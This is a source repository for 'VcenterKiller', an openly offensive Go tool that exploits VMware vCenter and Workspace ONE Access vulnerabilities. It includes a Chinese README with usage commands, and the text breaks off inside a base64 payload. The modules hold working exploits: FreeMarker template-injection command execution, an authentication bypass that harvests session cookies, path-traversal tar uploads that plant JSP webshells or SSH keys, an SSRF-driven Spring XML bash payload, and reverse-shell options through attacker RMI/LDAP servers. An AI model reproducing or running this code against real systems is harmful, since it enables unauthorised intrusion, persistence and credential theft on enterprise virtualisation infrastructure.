├── img └── 1.jpg ├── src ├── c22954 │ └── c22954.go ├── c22972 │ └── c22972.go ├── c_21972 │ └── c_21972.go ├── c_21985 │ └── c_21985.go ├── log4jcenter │ ├── log4j.go │ └── server.go └── c_22005 │ └── c_22005.go ├── go.mod ├── README.md ├── main.go ├── LICENSE └── go.sum /img/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Schira4396/VcenterKiller/HEAD/img/1.jpg -------------------------------------------------------------------------------- /src/c22954/c22954.go: -------------------------------------------------------------------------------- 1 | package c22954 2 | 3 | import ( 4 | "fmt" 5 | urlparse "net/url" 6 | "os" 7 | "regexp" 8 | "strings" 9 | 10 | "github.com/imroc/req/v3" 11 | ) 12 | 13 | func Start(url, cmd string) { 14 | exploit(url, cmd) 15 | 16 | } 17 | 18 | var Proxy_server = "" 19 | 20 | func check(content string) bool { 21 | if strings.Contains(content, "console.log") { 22 | return true 23 | } else { 24 | return false 25 | } 26 | } 27 | 28 | func exploit(url, command string) { 29 | url = url + "/catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7b%22freemarker.template.utility.Execute%22%3fnew()(%22{command}%22)%7d" 30 | 31 | target := strings.Replace(url, "{command}", urlparse.QueryEscape(command), -1) 32 | // fmt.Println(target) 33 | client := req.C() 34 | client.EnableForceHTTP1() 35 | client.SetProxyURL(Proxy_server) 36 | client.EnableInsecureSkipVerify() 37 | // client.SetProxyURL("http://127.0.0.1:8080") 38 | resp, err := client.R().Get(target) 39 | if err != nil { 40 | println("[-] Connection err, please check the network.") 41 | os.Exit(0) 42 | } 43 | // fmt.Println(resp.String()) 44 | if check(resp.String()) { 45 | reg := regexp.MustCompile(`id:(.*)device`) 46 | res := string(reg.FindAllString(resp.String(), -1)[0]) 47 | res = strings.TrimRight(res, "\n, device") 48 | res = strings.TrimLeft(res, "id: ") 49 | res = strings.Replace(res, "\\n", "\n", -1) 50 | if res == "" { 51 | fmt.Println("[?] The exploit is successful but has no result.") 52 | } else { 53 | fmt.Printf("%s", res) 54 | } 55 | 56 | } else { 57 | fmt.Println("[-] Exploitation failure.") 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module GO_VCENTER 2 | 3 | go 1.18 4 | 5 | require ( 6 | github.com/go-resty/resty/v2 v2.10.0 7 | github.com/imroc/req/v3 v3.42.2 8 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 9 | github.com/vjeantet/ldapserver v1.0.1 10 | ) 11 | 12 | require ( 13 | github.com/andybalholm/brotli v1.0.6 // indirect 14 | github.com/cheekybits/genny v1.0.0 // indirect 15 | github.com/cloudflare/circl v1.3.6 // indirect 16 | github.com/fsnotify/fsnotify v1.7.0 // indirect 17 | github.com/gaukas/godicttls v0.0.4 // indirect 18 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 // indirect 19 | github.com/golang/mock v1.6.0 // indirect 20 | github.com/google/pprof v0.0.0-20231205033806-a5a03c77bf08 // indirect 21 | github.com/hashicorp/errwrap v1.1.0 // indirect 22 | github.com/hashicorp/go-multierror v1.1.1 // indirect 23 | github.com/klauspost/compress v1.17.4 // indirect 24 | github.com/lucas-clemente/quic-go v0.31.1 // indirect 25 | github.com/marten-seemann/qpack v0.3.0 // indirect 26 | github.com/marten-seemann/qtls-go1-16 v0.1.5 // indirect 27 | github.com/marten-seemann/qtls-go1-17 v0.1.2 // indirect 28 | github.com/marten-seemann/qtls-go1-18 v0.1.4 // indirect 29 | github.com/marten-seemann/qtls-go1-19 v0.1.2 // indirect 30 | github.com/nxadm/tail v1.4.11 // indirect 31 | github.com/onsi/ginkgo v1.16.5 // indirect 32 | github.com/onsi/ginkgo/v2 v2.13.2 // indirect 33 | github.com/quic-go/qpack v0.4.0 // indirect 34 | github.com/quic-go/qtls-go1-20 v0.4.1 // indirect 35 | github.com/quic-go/quic-go v0.40.0 // indirect 36 | github.com/refraction-networking/utls v1.5.4 // indirect 37 | go.uber.org/mock v0.3.0 // indirect 38 | golang.org/x/crypto v0.16.0 // indirect 39 | golang.org/x/exp v0.0.0-20231127185646-65229373498e // indirect 40 | golang.org/x/mod v0.14.0 // indirect 41 | golang.org/x/net v0.19.0 // indirect 42 | golang.org/x/sys v0.15.0 // indirect 43 | golang.org/x/text v0.14.0 // indirect 44 | golang.org/x/tools v0.16.0 // indirect 45 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 // indirect 46 | ) 47 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![vckiller](https://socialify.git.ci/Schira4396/VcenterKiller/image?description=1&descriptionEditable=%E4%B8%80%E6%AC%BE%E9%92%88%E5%AF%B9Vcenter%E7%9A%84%E7%BB%BC%E5%90%88%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7&font=Inter&forks=1&issues=1&language=1&name=1&owner=1&pattern=Plus&stargazers=1&theme=Light) 3 | ![GitHub Downloads (all assets, all releases)](https://img.shields.io/github/downloads/schira4396/vcenterkiller/total) 4 | 5 | 6 | # VcenterKiller 7 | 8 | #### -1.注意 9 | 10 | 在本地搭建漏洞环境的兄弟,用vckiller验证log4j基本上会失败,因为在Vmware 虚拟机环境下用NAT模式的话,验证模块中的出口网卡会被判定为127.0.0.1,这样目标访问的LDAP Server地址就变成了127.0.0.1,验证就失败了😏 11 | 12 | #### 0.必读 13 | 如果遇到bug请提issue,写这个工具单纯是为了方便,它没有什么高大上的东西 14 | 15 | 16 | 17 | #### 1.它是什么 18 | 19 | 一款针对Vcenter的综合**验证**工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(~~需要一个ldap恶意服务器~~),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。 20 | 21 | #### 2.它的定位 22 | 23 | 一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出。 24 | 25 | 为什么用GO,因为Python写起来方便但是用起来很蛋疼,各种依赖库,并且编译出来体积太大,C#没法跨平台,写到一半扔了。 26 | 27 | #### 3.使用方法 28 | 29 | ```bash 30 | go build -o main.exe 31 | 32 | ./main.exe -u https://192.168.1.1 -m 21985 -c whoami 33 | ./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp 34 | ./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp 35 | ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥 36 | ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx 37 | ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j 38 | ./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务 39 | ./main.exe -u https://xx.xx.com -m 22954 whoami 40 | ./main.exe -u https://xx.xx.com -m 22972 //get cookie 41 | ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656 42 | ``` 43 | 44 | #### 4.免责声明 45 | 46 | 本工具仅面向**合法授权**的企业安全建设行为,例如企业内部攻防演练、漏洞验证和复测,如您需要测试本工具的可用性,请自行搭建靶机环境。 47 | 48 | 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标使用。** 49 | 50 | 如您在使用本工具的过程中存在任何非法行为,**您需自行承担相应后果**,我们将不承担任何法律及连带责任。 51 | 52 | #### 5.更新日志 53 | 54 | ```bash 55 | V1.0 上线 56 | V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能,前提是你要启动一个rmi服务器,例如jndi-injection-exploit 57 | V1.2 增加了针对Vcenter的log4j检测和验证能力 58 | V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过 59 | V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口 60 | V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。 61 | V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了 62 | v1.3.4 修改了对log4j的验证逻辑,目前的逻辑是循环5次不同payload无差别乱打,有回显就有,没有就没有 63 | v1.3.5 消除了log4j对Jndi-Injection-Exploit的依赖,能够直接执行命令并获取回显 64 | v1.3.6 针对21972的ssh功能进行了修改并优化了其他细节 65 | v1.3.7 添加了代理功能,支持http和socks 66 | v1.3.8 还未开始,考虑添加功能... 67 | ... 68 | ``` 69 | 70 | -------------------------------------------------------------------------------- /src/c22972/c22972.go: -------------------------------------------------------------------------------- 1 | package c22972 2 | 3 | /* cve-2022-31656 too*/ 4 | import ( 5 | "fmt" 6 | "github.com/imroc/req/v3" 7 | "os" 8 | "regexp" 9 | "strings" 10 | "time" 11 | ) 12 | 13 | func Start(url, host, cve string) { 14 | if cve == "22972" { 15 | uri_cve = "/SAAS/auth/login/embeddedauthbroker/callback" 16 | } else if cve == "31656" { 17 | uri_cve = "/SAAS/t/_/;/auth/login/embeddedauthbroker/callback" 18 | } 19 | Exploit(url, host) 20 | } 21 | 22 | var uri_cve = "" 23 | var Proxy_server = "" 24 | 25 | func retry(client *req.Request, url string) { 26 | login, err := client.Post(url + uri_cve) 27 | if err != nil { 28 | println("[-] Connection err, please check the network.") 29 | os.Exit(0) 30 | // log.Fatal(err) 31 | } 32 | 33 | cookies := login.Cookies() 34 | if len(cookies) > 1 && login.StatusCode == 302 { 35 | 36 | } else { 37 | println("[-] Exploitation failure.") 38 | } 39 | 40 | for i := 0; i < len(cookies); i++ { 41 | if cookies[i].Name == "HZN" { 42 | println(cookies[i].Value) 43 | os.Exit(0) 44 | } 45 | } 46 | } 47 | 48 | func Exploit(url, host string) { 49 | client := req.C() 50 | client.EnableForceHTTP1() 51 | client.SetCommonHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36") 52 | client.EnableInsecureSkipVerify() 53 | client.SetProxyURL(Proxy_server) 54 | client.SetTimeout(18 * time.Second) 55 | client.SetRedirectPolicy(req.NoRedirectPolicy()) 56 | resp, err := client. 57 | R(). 58 | Get(url + "/SAAS/auth/login") 59 | if err != nil { 60 | println("[-] Connection err, please check the network.") 61 | os.Exit(0) 62 | 63 | } 64 | 65 | content := resp.String() 66 | xsrf_token := "" 67 | if len(resp.Cookies()) <= 1 { 68 | xsrf_token = resp.Cookies()[1].Value 69 | } else { 70 | fmt.Println("[-] Failed to get xsrf token...") 71 | os.Exit(0) 72 | } 73 | 74 | data := map[string]string{ 75 | "protected_state": "e" + getprotectState(content), 76 | "userStoreName": "System Domain", 77 | "username": "admin", 78 | "password": "123", 79 | "userstoreDisplay": "System Domain", 80 | "horizonRelayState": gethorizonRelayState(content), 81 | "stickyConnectorId": "", 82 | "acion": "signIn", 83 | "LOGIN_XSRF": xsrf_token, 84 | } 85 | domain := []string{"oast.online", "oast.pro", "oast.fun"} 86 | 87 | rec := client.R(). 88 | SetFormData(data) 89 | if len(host) == 0 { 90 | client.SetTimeout(15 * time.Second) 91 | for _, value := range domain { 92 | fmt.Println("[*] Use domain: " + value) 93 | rec.SetHeader("Host", value) 94 | retry(rec, url) 95 | } 96 | } else { 97 | rec.SetHeader("Host", host) 98 | retry(rec, url) 99 | } 100 | 101 | } 102 | 103 | func gethorizonRelayState(conntent string) string { 104 | reg := regexp.MustCompile(`"horizonRelayState" value="(.*)/>`) 105 | res := reg.FindAllString(conntent, -1) 106 | horizonRelayState := strings.TrimLeft(res[0], `"horizonRelayState" value="`) 107 | horizonRelayState = strings.TrimRight(horizonRelayState, `"/>`) 108 | // fmt.Println(horizonRelayState) 109 | return horizonRelayState 110 | 111 | } 112 | 113 | func getprotectState(content string) string { 114 | reg := regexp.MustCompile(`"protected_state" value="(.*)"/>`) 115 | res := reg.FindAllString(content, -1) 116 | // fmt.Print(res[0] + "\n") 117 | protected_state := strings.TrimLeft(res[0], `"protected_state" value="`) 118 | // fmt.Println(protected_state + "qq") 119 | protected_state = strings.TrimRight(protected_state, `"/>`) 120 | // fmt.Println("---------------------------\n") 121 | // fmt.Println(protected_state) 122 | return protected_state 123 | } 124 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "GO_VCENTER/src/c22954" 5 | "GO_VCENTER/src/c22972" 6 | "GO_VCENTER/src/c_21972" 7 | "GO_VCENTER/src/c_21985" 8 | "GO_VCENTER/src/c_22005" 9 | "GO_VCENTER/src/log4jcenter" 10 | "flag" 11 | "fmt" 12 | "io/ioutil" 13 | url_parse "net/url" 14 | "os" 15 | ) 16 | 17 | // 1 18 | var ( 19 | h bool 20 | url string 21 | filename string 22 | cve string 23 | command string 24 | proxy string 25 | exp_type string 26 | rmi string 27 | ) 28 | 29 | func usage() { 30 | fmt.Println(`Usage of main.exe: 31 | -u url 32 | you target, example: https://192.168.1.1 33 | -m module 34 | you selected cve code, example: 21972 or 22005 or 21985 or log4center 35 | -c command 36 | you want execute command, example: "whoami" 37 | -f filename 38 | to upload webshell, expamle: behinder.jsp or antsword.jsp or gozllia.jsp 39 | -t attack mode 40 | your attack mode, example: use "ssh" to get ssh shell, not webshell, use -r rmi://xx/xx to get reverseshell 41 | -r rmi server 42 | your ldap & rmi server 43 | -proxy ProxyServer`) 44 | } 45 | 46 | func banner() { 47 | ban := ` 48 | __ __ _ _ ___ _ _ 49 | \ \ / /__ ___ _ __ | |_ ___ _ __ | |/ (_) | | ___ _ __ 50 | \ \ / / __/ _ \ '_ \| __/ _ \ '__| | ' /| | | |/ _ \ '__| 51 | \ V / (_| __/ | | | || __/ | | . \| | | | __/ | 52 | \_/ \___\___|_| |_|\__\___|_| |_|\_\_|_|_|\___|_| by schira4396 53 | ` 54 | fmt.Println(ban) 55 | } 56 | 57 | func main() { 58 | flag.StringVar(&url, "u", "", "your target") 59 | flag.StringVar(&filename, "f", "", "filename") 60 | flag.StringVar(&cve, "m", "", "select cve") 61 | flag.StringVar(&command, "c", "", "command") 62 | flag.StringVar(&exp_type, "t", "", "CVE-2021-21972 Module") 63 | flag.StringVar(&rmi, "r", "", "rmi server address") 64 | flag.StringVar(&rmi, "proxy", "", "proxy server, support http and socks5") 65 | flag.Usage = usage 66 | flag.Parse() 67 | banner() 68 | if len(os.Args) == 3 { 69 | usage() 70 | os.Exit(0) 71 | } 72 | if url == "" || cve == "" { 73 | usage() 74 | os.Exit(0) 75 | } 76 | fmt.Println("[*] url: " + url) 77 | switch cve { 78 | case "22005": 79 | { 80 | if checkProxyServer(proxy) == true { 81 | c_22005.Proxy_server = proxy 82 | } else { 83 | c_22005.Proxy_server = "" 84 | } 85 | 86 | c_22005.Test(url, filename) 87 | } 88 | case "21985": 89 | { 90 | if checkProxyServer(proxy) == true { 91 | c_21985.Proxy_server = proxy 92 | } else { 93 | c_21985.Proxy_server = "" 94 | } 95 | if exp_type == "rshell" { 96 | c_21985.Exploit(url, rmi) 97 | } else if exp_type == "" { 98 | c_21985.Attack(url, command) 99 | } else { 100 | fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.") 101 | } 102 | 103 | } 104 | case "21972": 105 | { 106 | if checkProxyServer(proxy) == true { 107 | c_21972.Proxy_server = proxy 108 | } else { 109 | c_21972.Proxy_server = "" 110 | } 111 | t, err := ioutil.ReadFile(filename) 112 | _ = err 113 | fmt.Println(string(t)) 114 | if exp_type == "ssh" { 115 | c_21972.Upload_ssh_authorized_keys(url, string(t)) 116 | } else if exp_type == "" { 117 | c_21972.Upload_windows_shell(url, string(t)) 118 | c_21972.Upload_linux_shell(url, string(t)) 119 | } else { 120 | fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.") 121 | } 122 | } 123 | case "log4center": 124 | { 125 | if checkProxyServer(proxy) == true { 126 | log4jcenter.Proxy_server = proxy 127 | } else { 128 | log4jcenter.Proxy_server = "" 129 | } 130 | if exp_type == "scan" { 131 | 132 | log4jcenter.StartScan(url) 133 | } else if exp_type == "rshell" { 134 | if rmi != "" { 135 | log4jcenter.StartExploit(url, rmi) 136 | } else { 137 | usage() 138 | } 139 | 140 | } else if exp_type == "exec" { 141 | if command == "" { 142 | usage() 143 | os.Exit(0) 144 | } else { 145 | 146 | go log4jcenter.Start_server() 147 | log4jcenter.Execc(url, rmi, command) 148 | 149 | } 150 | 151 | } else { 152 | fmt.Println("\"" + exp_type + "\"" + " is an incorrect parameter.") 153 | } 154 | 155 | } 156 | case "22954": 157 | { 158 | if checkProxyServer(proxy) == true { 159 | c22954.Proxy_server = proxy 160 | } else { 161 | c22954.Proxy_server = "" 162 | } 163 | if command != "" { 164 | c22954.Start(url, command) 165 | } else { 166 | usage() 167 | } 168 | } 169 | case "22972": 170 | { 171 | if checkProxyServer(proxy) == true { 172 | c22972.Proxy_server = proxy 173 | } else { 174 | c22972.Proxy_server = "" 175 | } 176 | c22972.Start(url, "", "22972") 177 | } 178 | case "31656": 179 | { 180 | if checkProxyServer(proxy) == true { 181 | c22972.Proxy_server = proxy 182 | } else { 183 | c22972.Proxy_server = "" 184 | } 185 | c22972.Start(url, "", "31656") 186 | } 187 | } 188 | 189 | } 190 | 191 | func checkProxyServer(Proxy_url string) bool { 192 | _, err := url_parse.Parse(Proxy_url) 193 | if err != nil { 194 | return true 195 | } else { 196 | return false 197 | } 198 | } 199 | -------------------------------------------------------------------------------- /src/c_21972/c_21972.go: -------------------------------------------------------------------------------- 1 | package c_21972 2 | 3 | import ( 4 | // "HttpRequest" 5 | "archive/tar" 6 | "bytes" 7 | "os" 8 | "os/exec" 9 | "strconv" 10 | "time" 11 | 12 | // "crypto/tls" 13 | "fmt" 14 | "log" 15 | 16 | // "strconv" 17 | "strings" 18 | 19 | "github.com/imroc/req/v3" 20 | ) 21 | 22 | var user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Edg/80.0.361.54" 23 | var Proxy_server = "" 24 | 25 | func Readme() { 26 | fmt.Println("I'm 21972") 27 | } 28 | 29 | func Generate_tar(name string, o_name string, step string) bytes.Buffer { 30 | // 创建一个缓冲区用来保存压缩文件内容 31 | var buf bytes.Buffer 32 | // 创建一个压缩文档 33 | tw := tar.NewWriter(&buf) 34 | // 定义一堆文件 35 | // 将文件写入到压缩文档tw 36 | tar_file_name := "" 37 | // filename := "" 38 | if o_name == "windows" { 39 | tar_file_name = "../../../../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/" + "vsph3re.jsp" 40 | // filename = "win.tar" 41 | 42 | } else if o_name == "ssh" { 43 | tar_file_name = "../../../../../home/vsphere-ui/.ssh/authorized_keys" 44 | // filename = "cron.tar" 45 | } else { 46 | tar_file_name = strings.Replace("../../../../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/qq/0/h5ngc.war/resources/", "qq", step, 1) + "vsph3re.jsp" 47 | // filename = "linux.tar" 48 | } 49 | var files = []struct { 50 | Name, Body string 51 | }{ 52 | {tar_file_name, string(name)}, 53 | } 54 | //fmt.Println(tar_file_name) 55 | for _, file := range files { 56 | hdr := &tar.Header{ 57 | Name: file.Name, 58 | Mode: 0600, 59 | Size: int64(len(file.Body)), 60 | } 61 | if err := tw.WriteHeader(hdr); err != nil { 62 | log.Fatal(err) 63 | } 64 | if _, err := tw.Write([]byte(file.Body)); err != nil { 65 | log.Fatal(err) 66 | } 67 | } 68 | if err := tw.Close(); err != nil { 69 | log.Fatal(err) 70 | } 71 | 72 | // // 将压缩文档内容写入文件 file.tar.gz 73 | // f, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY, 0666) 74 | // if err != nil { 75 | // log.Fatal(err) 76 | // } 77 | // buf.WriteString("qq") 78 | // ss := buf.String() 79 | // q, err := os.OpenFile("new"+filename, os.O_CREATE|os.O_WRONLY, 0666) 80 | // if err != nil { 81 | // log.Fatal(err) 82 | // } 83 | // q.WriteString(ss) 84 | // a := io.ByteReader(buf) 85 | // buf.WriteTo(f) 86 | // fmt.Println(buf.Bytes()) 87 | return buf 88 | 89 | } 90 | 91 | func Upload_shell(url string, buf bytes.Buffer) bool { 92 | client := req.C().DisableDumpAll().DisableDebugLog() // Use C() to create a client. 93 | client.EnableInsecureSkipVerify() 94 | client.EnableForceHTTP1() 95 | client.SetUserAgent(user_agent) 96 | client.SetProxyURL(Proxy_server) 97 | resp, err := client.R().SetFileBytes("uploadFile", "test.tar", buf.Bytes()).Post(url + "/ui/vropspluginui/rest/services/uploadova") // Use R() to create a request. 98 | if err != nil { 99 | _ = err 100 | fmt.Println("[-] Upload failure, please check network.") 101 | os.Exit(0) 102 | } 103 | // log.Fatal(err) 104 | _ = resp 105 | // fmt.Println(resp) 106 | //fmt.Printf(string(buf)) 107 | if resp.String() == "SUCCESS" { 108 | return true 109 | } else { 110 | return false 111 | } 112 | 113 | } 114 | 115 | func Upload_windows_shell(url, tar_content string) { 116 | buffer := Generate_tar(tar_content, "windows", "?") 117 | res := Upload_shell(url, buffer) 118 | if !res { 119 | fmt.Println("[-] Windows Upload failure,try Linux...") 120 | return 121 | } 122 | 123 | Check_shell(url, "windows") 124 | 125 | } 126 | 127 | func Upload_linux_shell(url, tar_content string) { 128 | for i := 1; i <= 121; i++ { 129 | buffer := Generate_tar(tar_content, "linux", strconv.Itoa(i)) 130 | if Upload_shell(url, buffer) { 131 | Check_shell(url, "linux") 132 | } else { 133 | fmt.Println("[-] Linux pload failure.") 134 | return 135 | } 136 | 137 | // wg.Add(1) 138 | // go Upload_linux(strconv.Itoa(i)) 139 | 140 | // } 141 | // buffer := c_21972.Generate_tar("1.txt", "win", "1") 142 | // c_21972.Upload_shell(buffer) 143 | // Upload_linux(strconv.Itoa(2)) 144 | } 145 | // wg.Wait() 146 | } 147 | 148 | func Upload_ssh_authorized_keys(url, tar_content string) { 149 | target_ip := strings.Replace(url, "https://", "", 1) 150 | buffer := Generate_tar(tar_content, "ssh", "?") 151 | success := Upload_shell(url, buffer) 152 | if !success { 153 | fmt.Println("Upload failure.") 154 | return 155 | } 156 | cmd := exec.Command("ssh", "vsphere-ui@"+target_ip, "whoami") 157 | output, err := cmd.Output() 158 | 159 | if err != nil { 160 | panic(err) 161 | } 162 | // 因为结果是字节数组,需要转换成string 163 | res := strings.Replace((string(output)), "\n", "", 1) 164 | if res == "vsphere-ui" { 165 | fmt.Println("Upload success, UserName: vsphere-ui") 166 | } else { 167 | fmt.Println("Exploit failure.") 168 | os.Exit(0) 169 | } 170 | 171 | } 172 | 173 | func Check_shell(url string, os_name string) { 174 | client := req.C().DisableDumpAll().DisableDebugLog() 175 | client.EnableInsecureSkipVerify() 176 | client.EnableForceHTTP1() 177 | client.SetTimeout(3 * time.Second) 178 | client.DisableKeepAlives() 179 | client.SetProxyURL(Proxy_server) 180 | client.SetUserAgent(user_agent) 181 | 182 | shell_url := "" 183 | if os_name == "windows" { 184 | shell_url = url + "/statsreport/vsph3re.jsp" 185 | } else if os_name == "linux" { 186 | shell_url = url + "/ui/resources/vsph3re.jsp" 187 | } else { 188 | panic("url error") 189 | } 190 | resp, err := client.R().Get(shell_url) // Use R() to create a request. 191 | if err != nil { 192 | fmt.Println("Please check network.") 193 | os.Exit(0) 194 | } 195 | a := resp.StatusCode 196 | 197 | if a == 200 { 198 | fmt.Println("[+] Upload success, " + shell_url) 199 | os.Exit(0) 200 | 201 | } else { 202 | // fmt.Println("利用失败.") 203 | // os.Exit(0) 204 | } 205 | } 206 | -------------------------------------------------------------------------------- /src/c_21985/c_21985.go: -------------------------------------------------------------------------------- 1 | package c_21985 2 | 3 | import ( 4 | "archive/zip" 5 | "bytes" 6 | "encoding/base64" 7 | "fmt" 8 | "io/ioutil" 9 | "log" 10 | "os" 11 | "strings" 12 | "time" 13 | 14 | "github.com/imroc/req/v3" 15 | ) 16 | 17 | var user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Edg/80.0.361.54" 18 | var Proxy_server = "" 19 | 20 | func To_b64(file_byte []byte) string { 21 | // fmt.Println(base64.StdEncoding.EncodeToString(file_byte)) 22 | return base64.StdEncoding.EncodeToString(file_byte) 23 | 24 | } 25 | 26 | func Upload(url, b64_str string) { 27 | 28 | ssrf_url := strings.Replace("https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,qq%23", "qq", b64_str, -1) 29 | tarGet := url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages" 30 | // fmt.Println(ssrf_url) 31 | // jsonText := "{\"methodInput\":" + "[[\"" + ssrf_url + "\"]]}" 32 | jsonText := fmt.Sprintf("{\"methodInput\":[[\"%s\"]]}", ssrf_url) 33 | 34 | client := req.C().DisableDumpAll().DisableDebugLog() 35 | client.EnableInsecureSkipVerify() 36 | client.EnableForceHTTP1() 37 | client.SetTimeout(3 * time.Second) 38 | client.DisableKeepAlives() 39 | client.SetProxyURL(Proxy_server) 40 | client.SetUserAgent(user_agent) 41 | resp, err := client.R().SetContentType("application/json").SetBodyString(jsonText).Post(tarGet) 42 | if err != nil { 43 | _ = err 44 | fmt.Println("[-] Upload failure, please check network.") 45 | os.Exit(0) 46 | } 47 | if resp.StatusCode == 200 { 48 | fmt.Println("[+] Upload success, try command execute.") 49 | } else { 50 | fmt.Println("[-] Exploit failure, There are no vulnerabilities in the target.") 51 | os.Exit(0) 52 | } 53 | 54 | // fmt.Println(client) 55 | 56 | } 57 | 58 | func Execute(url string) { 59 | 60 | tarGet := url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty" 61 | 62 | jsonText := "{\"methodInput\":" + " [" + "\"output\", null" + "]}" 63 | 64 | client := req.C().DisableDumpAll().DisableDebugLog() 65 | client.EnableInsecureSkipVerify() 66 | client.EnableForceHTTP1() 67 | client.SetTimeout(3 * time.Second) 68 | client.SetUserAgent(user_agent) 69 | client.DisableKeepAlives() 70 | client.SetProxyURL(Proxy_server) 71 | resp, err := client.R().SetContentType("application/json").SetBody(jsonText).Post(tarGet) 72 | if err != nil { 73 | fmt.Println("[-] Command execution failed, Please check network.") 74 | os.Exit(0) 75 | } 76 | _ = err 77 | 78 | // fmt.Println(string(data)) 79 | // fmt.Println(jsonparser.GetString([]byte(data), "result")) 80 | 81 | fmt.Println(strings.Replace(resp.String(), "\\n", "\n", -1)) 82 | 83 | } 84 | 85 | func Generate_xml(command string) []byte { 86 | b64_str := "PGJlYW5zIHhtbG5zPSJodHRwOi8vd3d3LnNwcmluZ2ZyYW1ld29yay5vcmcvc2NoZW1hL2JlYW5zIgogICAgICAgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIKICAgICAgIHhzaTpzY2hlbWFMb2NhdGlvbj0iCiAgICAgaHR0cDovL3d3dy5zcHJpbmdmcmFtZXdvcmsub3JnL3NjaGVtYS9iZWFucyBodHRwOi8vd3d3LnNwcmluZ2ZyYW1ld29yay5vcmcvc2NoZW1hL2JlYW5zL3NwcmluZy1iZWFucy54c2QiPgogICAgPGJlYW4gaWQ9InBiIiBjbGFzcz0iamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIj4KICAgICAgICA8Y29uc3RydWN0b3ItYXJnPgogICAgICAgICAgPGxpc3Q+CiAgICAgICAgICAgIDx2YWx1ZT4vYmluL2Jhc2g8L3ZhbHVlPgogICAgICAgICAgICA8dmFsdWU+LWM8L3ZhbHVlPgogICAgICAgICAgICA8dmFsdWU+PCFbQ0RBVEFbIHtjbWR9IDI+JjEgXV0+PC92YWx1ZT4KICAgICAgICAgIDwvbGlzdD4KICAgICAgICA8L2NvbnN0cnVjdG9yLWFyZz4KICAgIDwvYmVhbj4KICAgIDxiZWFuIGlkPSJpcyIgY2xhc3M9ImphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIiPgogICAgICAgIDxjb25zdHJ1Y3Rvci1hcmc+CiAgICAgICAgICAgIDx2YWx1ZT4je3BiLnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKX08L3ZhbHVlPgogICAgICAgIDwvY29uc3RydWN0b3ItYXJnPgogICAgPC9iZWFuPgogICAgPGJlYW4gaWQ9ImJyIiBjbGFzcz0iamF2YS5pby5CdWZmZXJlZFJlYWRlciI+CiAgICAgICAgPGNvbnN0cnVjdG9yLWFyZz4KICAgICAgICAgICAgPHZhbHVlPiN7aXN9PC92YWx1ZT4KICAgICAgICA8L2NvbnN0cnVjdG9yLWFyZz4KICAgIDwvYmVhbj4KICAgIDxiZWFuIGlkPSJjb2xsZWN0b3JzIiBjbGFzcz0iamF2YS51dGlsLnN0cmVhbS5Db2xsZWN0b3JzIj48L2JlYW4+CiAgICA8YmVhbiBpZD0ic3lzdGVtIiBjbGFzcz0iamF2YS5sYW5nLlN5c3RlbSI+CiAgICAgICAgPHByb3BlcnR5IG5hbWU9IndoYXRldmVyIiB2YWx1ZT0iI3sgc3lzdGVtLnNldFByb3BlcnR5KCZxdW90O2